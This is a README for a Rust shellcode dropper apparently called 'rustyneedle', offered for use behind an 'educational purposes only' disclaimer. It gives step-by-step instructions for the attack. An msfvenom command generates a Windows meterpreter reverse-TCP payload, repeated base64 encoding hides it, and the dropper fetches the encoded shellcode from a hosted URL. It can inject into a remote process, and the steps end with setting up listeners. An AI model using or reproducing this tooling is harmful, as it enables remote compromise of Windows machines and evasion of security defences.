THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY. I take no responsibility if you decide to do crimes with this code.
A simple dropper for shellcode that leverages the power of...base64 encoding??
No seriously. And it works. Here's how:
-
Create your shellcode however you like, be it with
msfvenomor other tools. Export the raw shellcode file. -
Use the encode.py script provided in this repository to create an encoded version of the shellcode.
python3 encode.py [SHELLCODE_FILE] [B64_ITERATIONS] [OUT_FILE]SHELLCODE_FILE: raw shellcode file to encodeB64_ITERATIONS: # of times to base64-encode the shellcodeOUT_FILE: Resulting text file of the encoded shellcode. NOTE: this will be many times larger than the source!IGNORE_SSL: Ignores SSL/TLS errors.
If you don't want to use the script, you can also encode raw shellcode from msfvenom. It would go something like this:
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$LHOST LPORT=$LPORT -f raw | base64 -w 0 > note.txt
# Pipe to base64 -w 0 as many times as you want to iterate the encoding-
Edit the source code in
src/main.rsto reflect theURLwhere the encoded shellcode will be hosted. Make sureB64_TTERATIONSmatches what you created withencode.py. If you wish to use remote injection, change thePROCESS_NAMEvalue as well. -
Run
cargo build --target x86_64-pc-windows-gnu --release. If building on Linux for Windows, make sure you've added the Windows target triple withrustup target add x86_64-pc-windows-gnu. -
Copy the resulting exe in
target/x86_64-pc-windows-gnu/release/rustyneedle.exewherever you like. -
Set up any listeners, then execute the dropper!